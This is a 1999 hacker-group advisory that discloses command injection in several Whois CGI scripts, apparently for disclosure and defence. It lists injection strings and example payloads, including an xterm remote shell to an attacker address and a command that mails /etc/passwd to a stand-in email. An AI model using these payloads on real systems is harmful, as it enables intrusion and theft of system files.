(hhp) Whois.CGI - ADVISORY. (hhp) hhp-ADV#12 11/9/99 8:42:57pm CST By: loophole hhp@hhp.perlx.com - http://hhp.perlx.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ What?: Hole in several known/unknown Whois CGI packages. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Versions?: 1.) Whois Internic Lookup - version: 1.0 2.) CC Whois - Version: 1.0 3.) Matt's Whois - Version: 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exploit!: These versions allow execution of commands due to lack of shell escape character parsing if the domain entries consist of one of the following strings... Note: (Strings will vary for different vulnerable versions.) 1.) ;commands 2.) ";commands 3.) ;commands; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Example!: If the domain entries consist of: 1.) ;id 2.) ";id or either, 3.) ;id; you will see something like this: 'Whois Server Version 1.1 Domain names in the .com, .net, and .org domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. etc. etc. etc.... (scroll to the bottom of the output.) uid=501(blah) gid=500(blah)' ^^^^^\ ` 'id' was executed on the server. Other example commands can be ran also... ;xterm -display ip:0.0 -rv -e /bin/sh ";uname -a;whoami;w;ls -al ;cat /etc/passwd|mail you@yourdomain.com; Etc, Etc. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Foo!: Alot of main *NIC* servers were found running vulnerable versions. I am in the process of contacting the main servers, and the software programmers to advise the vulnerability. Very well known/used sites are vulnerable (Which will rename nameless for security reasons). I tried to get in contact with them, but being such a big company/service, I failed, so sad indeed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Fix?: If you run one of these bad scripts, delete it and point your browser to: http://cgi.resourceindex.com/Programs_and_ Scripts/Perl/Internet_Utilities/Whois/ and download one of the secure packages. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Shouts to all of hhp. Fuck you to gH for trying to rip this ADV before I could release it. ---hhp-2t0--------------------------------